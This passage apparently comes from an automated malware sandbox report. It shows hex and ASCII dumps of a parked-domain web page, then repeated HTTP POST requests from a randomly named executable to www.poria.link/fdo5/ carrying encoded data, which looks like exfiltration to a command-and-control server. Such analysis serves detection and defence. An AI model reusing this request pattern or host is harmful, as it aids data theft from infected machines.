3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 53 6f 75 72 63 65 2b 53 61 6e 73 2b 50 72 6f 3a 34 30 30 2c 39 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 72 65 73 65 72 76 65 64 2e 74 72 61 6e 73 69 70 2e 6e 6c 2f 61 73 73 65 74 73 2f 63 73 73 2f 63 6f 6d 62 69 6e 65 64 2d 6d 69 6e 2e 63 73 73 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 42 65 7a 65 74 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 36 20 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 6c 65 66 74 20 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                              Data Ascii: <!DOCTYPE html><html> <head lang="en"> <meta charset="ascii"> <title>TransIP - Reserved domain</title> <meta name="description" content="TransIP - Reserved domain"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <link rel="shortcut icon" href="//reserved.transip.nl/assets/img/favicon.ico" type="image/x-icon" /> <link href='https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,900' rel='stylesheet' type='text/css'> <link rel="stylesheet" href="//reserved.transip.nl/assets/css/combined-min.css"> <title>Bezet!</title> </head> <body> <div class="container"> <div role="navigation" class="reserved-nav-container"> <div class="col-xs-6 reserved-nav-left reserved-nav-brand">
                                                                                              Dec 3, 2023 16:27:21.443692923 CET1340INData Raw: 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 72 61 6e 73 69 70 2e 6e 6c 2f 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 2d 6c 69 6e 6b 20 6c 61 6e 67 5f 6e 6c 22 20 72 65 6c 3d 22
                                                                                              Data Ascii: <a href="https://transip.nl/" class="reserved-nav-brand-link lang_nl" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="
                                                                                              Dec 3, 2023 16:27:21.443732977 CET1340INData Raw: 32 2c 30 2d 33 2e 35 2c 30 2e 31 2d 34 2e 36 2c 30 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 2d 31 2e 31 2c 30 2e 34 2d 31 2e 37 2c 31 2e 33 2d 31 2e 37 2c 32 2e 38 76 30 2e 38 63
                                                                                              Data Ascii: 2,0-3.5,0.1-4.6,0.5 c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/>
                                                                                              Dec 3, 2023 16:27:21.443772078 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                              Data Ascii: /> <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g>
                                                                                              Dec 3, 2023 16:27:21.443813086 CET1340INData Raw: 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 2d 6c 69 6e 6b 20 6c 61 6e 67 5f 65 6e 20 68 69 64 64 65 6e 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65
                                                                                              Data Ascii: ved-nav-brand-link lang_en hidden" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="preserve"> <pa
                                                                                              Dec 3, 2023 16:27:21.443851948 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 20 63 2d 31 2e 31 2c 30 2e 34 2d 31 2e 37 2c 31 2e 33 2d 31 2e 37 2c 32 2e 38 76 30 2e 38 63 30 2c 31 2e 32 2c 30 2e 32 2c 32 2e 31 30 32 2c 30 2e 39 2c 32 2e 38 30 31 63 30 2e 37 2c 30 2e 36 39 39 2c 31 2e 38 2c 31 2c
                                                                                              Data Ascii: c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/> <path class="transip-logo-p
                                                                                              Dec 3, 2023 16:27:21.443892002 CET1340INData Raw: 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 72
                                                                                              Data Ascii: <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g> </g>
                                                                                              Dec 3, 2023 16:27:21.443933010 CET1340INData Raw: 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 73 77 69 74 63 68 4c 61 6e 67 75 61 67 65 28 27 6e 6c 27 29 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 66 6c 61 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                              Data Ascii: href="javascript:switchLanguage('nl')" class="reserved-nav-flag"> <svg class="flag-icon" xmlns="http://www.w3.org/2000/svg" height="15" width="20" viewBox="0 0 640 480" version="1"><g fill-rule="evenodd" stroke-width="1
                                                                                              Dec 3, 2023 16:27:21.443994045 CET1340INData Raw: 68 31 30 32 2e 34 56 30 68 2d 31 30 32 2e 34 7a 4d 2d 32 35 36 20 35 31 32 2e 30 31 4c 38 35 2e 33 34 20 33 34 31 2e 33 34 68 37 36 2e 33 32 34 6c 2d 33 34 31 2e 33 34 20 31 37 30 2e 36 37 48 2d 32 35 36 7a 4d 2d 32 35 36 20 30 4c 38 35 2e 33 34
                                                                                              Data Ascii: h102.4V0h-102.4zM-256 512.01L85.34 341.34h76.324l-341.34 170.67H-256zM-256 0L85.34 170.67H9.016L-256 38.164V0zm606.356 170.67L691.696 0h76.324L426.68 170.67h-76.324zM768.02 512.01L426.68 341.34h76.324L768.02 473.848v38.162z" fill="#c00"/></g><
                                                                                              Dec 3, 2023 16:27:21.444034100 CET1340INData Raw: 32 35 2e 35 2d 35 37 2c 35 37 73 32 35 2e 35 2c 35 37 2c 35 37 2c 35 37 73 35 37 2d 32 35 2e 35 2c 35 37 2d 35 37 53 31 33 31 2e 34 2c 34 34 2c 39 39 2e 39 2c 34 34 7a 20 4d 31 33 33 2e 34 2c 31 34 31 2e 33 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                              Data Ascii: 25.5-57,57s25.5,57,57,57s57-25.5,57-57S131.4,44,99.9,44z M133.4,141.3 c-3.7-1.8-15.9-4.2-18.8-6.1c-3.4-2.1-2.3-13.7-2.3-13.7l2.3-2c0,0,0.6-5.2,1.6-7.1c2.2-4.3,4.6-11.4,4.6-11.4s2.3-1.7,2.3-4.
                                                                                              Dec 3, 2023 16:27:21.628475904 CET1340INData Raw: 20 20 20 20 20 20 6c 32 2e 35 2d 32 2e 35 63 30 2c 30 2c 30 2e 31 2c 30 2c 30 2e 31 2d 30 2e 31 63 30 2c 30 2c 30 2e 31 2d 30 2e 31 2c 30 2e 31 2d 30 2e 31 63 32 2e 39 2d 33 2c 33 2e 31 2d 37 2e 37 2c 30 2e 35 2d 31 30 2e 39 6c 30 2e 31 2c 30 63
                                                                                              Data Ascii: l2.5-2.5c0,0,0.1,0,0.1-0.1c0,0,0.1-0.1,0.1-0.1c2.9-3,3.1-7.7,0.5-10.9l0.1,0c-1.9-2.3-3.9-4.5-6-6.6c-2.2-2.2-4.4-4.2-6.8-6.2 l0,0c-2.9-2.4-7-2.4-10-0.3l-1.8,1.8l-1.7,1.7l-0.1-0.1c-3.6,3.6-8.8,4.


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              21192.168.2.449761172.67.184.73802492C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 3, 2023 16:27:35.987390995 CET712OUTPOST /fdo5/ HTTP/1.1
                                                                                              Host: www.poria.link
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.poria.link
                                                                                              Referer: http://www.poria.link/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 187
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 35 34 30 48 32 78 3d 38 59 65 51 5a 34 33 57 59 79 7a 51 52 6c 6d 30 4c 73 76 6e 39 44 54 49 6a 32 4b 5a 61 53 35 78 49 4c 4c 66 4f 31 71 6c 2b 6b 79 72 77 55 62 54 38 65 45 43 32 2f 71 6b 67 65 2b 66 78 37 63 72 64 42 66 36 2f 4f 52 57 63 74 43 79 79 79 4c 70 48 77 71 4d 38 49 4a 38 53 54 57 44 46 74 38 36 6e 51 66 53 70 30 47 64 59 53 4c 59 6a 7a 32 57 4d 38 30 45 47 42 41 53 73 6d 70 43 52 6a 79 39 63 47 6e 58 79 52 70 46 63 51 43 31 4a 5a 56 6e 6f 77 76 5a 50 58 59 4f 33 77 66 73 56 50 4f 5a 4c 34 43 31 36 6f 34 33 6e 36 66 58 44 45 34 6d 46 41 3d 3d
                                                                                              Data Ascii: 540H2x=8YeQZ43WYyzQRlm0Lsvn9DTIj2KZaS5xILLfO1ql+kyrwUbT8eEC2/qkge+fx7crdBf6/ORWctCyyyLpHwqM8IJ8STWDFt86nQfSp0GdYSLYjz2WM80EGBASsmpCRjy9cGnXyRpFcQC1JZVnowvZPXYO3wfsVPOZL4C16o43n6fXDE4mFA==


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              22192.168.2.449762172.67.184.73802492C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 3, 2023 16:27:38.636346102 CET732OUTPOST /fdo5/ HTTP/1.1
                                                                                              Host: www.poria.link
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.poria.link
                                                                                              Referer: http://www.poria.link/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 207
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 35 34 30 48 32 78 3d 38 59 65 51 5a 34 33 57 59 79 7a 51 52 46 57 30 48 76 48 6e 73 7a 54 4a 74 57 4b 5a 55 79 35 39 49 4c 48 66 4f 30 65 31 2b 57 6d 72 77 78 6e 54 37 63 73 43 31 2f 71 6b 79 2b 2b 51 2b 62 63 67 64 42 54 49 2f 4b 52 57 63 74 6d 79 79 79 62 70 41 48 65 44 38 59 4a 45 65 7a 57 46 59 64 38 36 6e 51 66 53 70 30 44 79 59 57 6e 59 6a 44 47 57 4e 5a 59 62 4d 68 41 52 72 6d 70 43 47 7a 79 78 63 47 6e 31 79 51 31 76 63 56 65 31 4a 62 64 6e 72 6c 62 61 47 58 59 49 34 51 65 4e 46 38 53 51 4c 34 58 4b 39 65 30 49 69 2b 71 36 43 52 55 31 43 79 35 51 32 50 62 63 65 50 4a 2f 50 6d 50 67 63 69 35 50 4d 63 45 3d
                                                                                              Data Ascii: 540H2x=8YeQZ43WYyzQRFW0HvHnszTJtWKZUy59ILHfO0e1+WmrwxnT7csC1/qky++Q+bcgdBTI/KRWctmyyybpAHeD8YJEezWFYd86nQfSp0DyYWnYjDGWNZYbMhARrmpCGzyxcGn1yQ1vcVe1JbdnrlbaGXYI4QeNF8SQL4XK9e0Ii+q6CRU1Cy5Q2PbcePJ/PmPgci5PMcE=


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              23192.168.2.449763172.67.184.73802492C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 3, 2023 16:27:41.291620016 CET10814OUTPOST /fdo5/ HTTP/1.1
                                                                                              Host: www.poria.link
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.poria.link
                                                                                              Referer: http://www.poria.link/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 10287
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 35 34 30 48 32 78 3d 38 59 65 51 5a 34 33 57 59 79 7a 51 52 46 57 30 48 76 48 6e 73 7a 54 4a 74 57 4b 5a 55 79 35 39 49 4c 48 66 4f 30 65 31 2b 57 2b 72 7a 44 66 54 37 36 6b 43 37 66 71 6b 78 2b 2f 58 2b 62 63 48 64 42 37 4d 2f 4b 63 72 63 76 75 79 7a 52 6a 70 46 79 79 44 33 59 4a 45 57 54 57 45 46 74 38 76 6e 51 50 65 70 30 54 79 59 57 6e 59 6a 41 65 57 4b 4d 30 62 44 42 41 53 73 6d 70 30 52 6a 79 56 63 47 76 50 79 51 77 61 66 68 53 31 4a 37 74 6e 6e 33 7a 61 62 6e 59 4b 30 77 65 76 46 38 66 49 4c 34 61 35 39 61 30 75 69 38 32 36 42 46 59 75 61 43 4a 62 6c 76 37 61 4e 75 68 74 56 48 36 6b 4e 7a 39 38 65 6f 4c 73 31 75 63 34 5a 41 4a 49 4c 56 4d 71 71 61 71 2f 72 38 2b 30 6c 35 64 4f 6e 6c 48 34 6e 70 52 2b 69 36 59 38 4d 72 39 6d 36 53 61 5a 6b 42 50 73 68 72 68 52 6f 6e 72 51 65 35 61 72 55 65 42 33 37 66 41 68 69 6b 47 61 2b 61 56 73 63 41 69 42 63 45 67 36 44 31 78 36 46 7a 4b 45 41 50 46 6c 68 69 63 76 6c 36 56 52 75 64 52 6e 30 50 4c 6d 32 42 47 4b 66 58 6e 43 6d 58 51 32 62 59 35 69 38 2b 67 63 6d 73 72 62 4e 71 38 44 39 54 44 42 41 65 35 4f 30 58 4d 7a 56 71 75 62 4e 34 52 72 45 61 53 58 48 53 41 56 63 4f 55 68 61 64 57 42 63 56 55 64 31 78 4f 31 70 70 70 63 30 36 2f 57 6b 4b 67 31 79 37 4b 4e 78 36 50 4d 43 41 78 65 66 4b 6a 48 73 61 6d 5a 42 6f 66 36 6b 48 75 49 46 42 33 61 30 70 69 77 52 50 65 71 63 67 39 6f 36 55 70 76 76 5a 32 33 6b 67 36 39 6d 54 66 6a 43 6e 43 64 5a 68 45 4b 56 48 4b 73 5a 53 5a 52 6d 6a 4b 4f 54 35 79 6c 44 57 38 71 4c 50 5a 61 44 38 2f 69 35 76 44 49 76 4b 54 64 6d 7a 75 78 66 46 30 57 4d 44 6d 77 79 2f 68 76 50 4b 52 4f 66 70 66 54 2b 39 33 49 5a 6f 54 38 2b 77 70 2f 54 6a 56 2f 5a 6c 61 49 4a 44 6e 51 30 35 37 72 54 4a 6e 6b 55 67 69 6a 68 36 69 76 2f 52 64 6f 46 35 49 65 70 56 6d 65 62 57 43 62 49 57 4a 64 31 6b 58 4d 4a 68 54 34 63 55 63 58 68 42 58 54 75 43 71 32 63 78 54 35 30 66 6d 43 7a 51 4f 34 56 52 4b 64 52 31 77 4b 54 46 31 6b 68 35 76 32 4d 6f 30 34 35 68 6e 64 39 46 41 65 62 4c 44 76 7a 62 41 6c 76 4a 48 72 58 77 4d 52 78 34 64 51 4c 58 48 68 6d 64 4d 43 46 69 76 6f 71 6c 2f 71 52 34 2b 34 6e 61 51 45 47 5a 31 77 38 2b 76 42 6e 51 61 79 65 79 76 71 47 4b 38 47 34 56 44 7a 2f 76 4f 55 50 39 57 43 73 4f 62 53 73 79 37 59 58 5a 58 35 4b 4b 61 37 67 75 4d 75 47 44 62 32 6a 67 78 2b 4b 31 6d 58 36 4f 34 47 71 4b 46 6e 66 53 48 6d 66 4d 57 6a 44 35 49 76 6c 46 6a 6b 57 33 49 2b 78 78 42 66 4e 50 46 62 62 4d 56 52 50 7a 6f 4c 50 4c 53 59 59 30 43 7a 35 6c 78 2f 4b 74 42 74 6e 61 64 53 39 66 2b 78 31 62 59 59 38 30 56 66 35 7a 42 37 4a 75 55 46 6a 45 65 54 53 4f 48 38 2f 47 32 2f 64 66 50 6a 32 43 2b 79 46 74 51 38 53 6c 39 57 4c 6b 61 62 43 47 72 50 6c 77 6c 39 32 6a 4b 42 43 2f 30 50 32 50 69 56 47 4b 53 6c 2f 6b 59 64 31 45 72 6a 6b 75 49 57 64 4a 57 31 43 53 50 65 6c 70 4a 66 67 5a 4e 6e 35 67 46 78 2f 6f 4b 4d 58 37 4f 67 2f 63 6d 57 35 52 61 66 76 79 33 61 30 52 76 32 78 32 39 74 39 6e 59 73 54 71 44 70 75 49 58 43 73 44 4a 68 73 47 44 72 75 54 79 47 75 54 73 6e 48 6a 72 2f 6c 42 74 77 53 54 66 66 52 6b 53 75 6a 63 44 35 74 33 58 78 61 64 49 70 71 34 50 74 2f 5a 78 53 62 78 75 64 51 33 33 51 47 54 54 74 59 4d 34 34 41 4d 44 7a 48 2b 2f 39 66 66 65 39 69 6c 79 41 6c 4c 77 58 2f 67 33 46 56 6f 79 36 55 36 5a 69 37 71 72 42 6f 4e 75 57 71 6c 54 34 79 43 54 4f 4e 32 56 76 78 64 33 73 44 6c 76 44 48 6c 59 2b 58 6b 58 67 41 6c 67 45 61 58 61 58 31 37 49 43 79 4b 58 4a 69 4a 39 6d 50 41 6c 6a 61 6c 6d 79 2b 6f 59 7a 34 53 70 55 6f 67 6f 37 51 32 37 5a 74 66 68 4d 37 6a 44 35 6a 4e 44 58 34 55 63 6d 74 62 38 64 42 46 53 6d 2f 4b 44 74 74 34 36 4d 35 4c 32 42 71 4a 69 51 4f 75 4d 6a 71 58 55 38 42 70 63 31 46 4c 45 2f 61 63 65 49 42 6a 43 79 38 75 49 69 78 36 2f 75 6d 56 57 38 73 6b 43 34 42 4e 44 55 62 47 44 46 48 35 62 71 6c 49 71 31 78 6b 68 52 6b 2b 32 74 50 51 54 53 4b 68 36 2b 32 78 62 76 78 39 77 31 50 41 7a 72 31 49 32 70 5a 6a 38 48 79 45 7a 42 4d 57 72 44 41 51 48 54 73 73 73 4c 4d 43 74 55 58 77 44 46 64 34 2b 44 6b 65 65 30 4d 44 41 6b 52 4e 59 6d 32 41 30 57 2f 33 51 76 30 51 47 6f 59 44 71 41 55 73 59 35 67 47 64 6c 6b 6a 78 58 71 69 41 4c 39 61 57 50 50 6e 78 53
                                                                                              Data Ascii: 540H2x=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


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              24192.168.2.449764172.67.184.73802492C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
